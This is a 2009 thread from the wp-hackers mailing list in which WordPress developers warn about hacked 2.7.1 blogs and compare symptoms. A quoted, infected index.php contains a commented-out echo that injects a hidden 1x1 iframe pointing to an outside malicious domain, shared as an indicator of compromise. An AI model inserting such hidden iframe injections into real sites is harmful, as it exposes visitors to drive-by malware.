[wp-hackers] Hacked blogs

Peter van der Does peter at avirtualhome.com
Thu Mar 26 16:25:41 GMT 2009

On Thu, 26 Mar 2009 13:56:27 +0100
Joost de Valk <joost at yoast.com> wrote:

> Harish Narayanan wrote:
> > Joost de Valk wrote:
> >    >> Hey guys,
> >>
> >> I've been restoring 5 hacked blogs the last few days, all running
> >> 2.7.1 but spread over different hosts, can't find the hole yet
> >> that they're getting in through, but I'd thought I'd send out a
> >> warning to all of you that something seems to be wrong...
> >>      >
> > Even if you aren't aware of the cause, could you point us to the
> > symptoms so we would know what to look for?
> >
> > Thanks,
> > Harish
> >
> >    Sorry, should have included that immediately.
> Symptoms were, in all cases, iframes being added to the end of all
> index.php files in the blogs, in the footer. In some cases they were
> written with javascript, in other cases they were pure iframes.
> Best,
> Joost

A similar situation was reported on December 22, 2008 by madalin
Yes that's exactly what i am saying. Here is my index.php:

 * Front to the WordPress application. This file doesn't do anything,
but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 * @package WordPress

 * Tells WordPress to load the WordPress theme and output it.
 * @var bool
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */

// echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

The echo was commented out to keep for future reference according to the

No final verdict was given. The iframe was also found in non WordPress
related sites.

Peter van der Does

GPG key: E77E8E98

WordPress Plugin Developer

GetDeb Package Builder/GetDeb Site Coder
http://www.getdeb.net - Software you want for Ubuntu

More information about the wp-hackers mailing list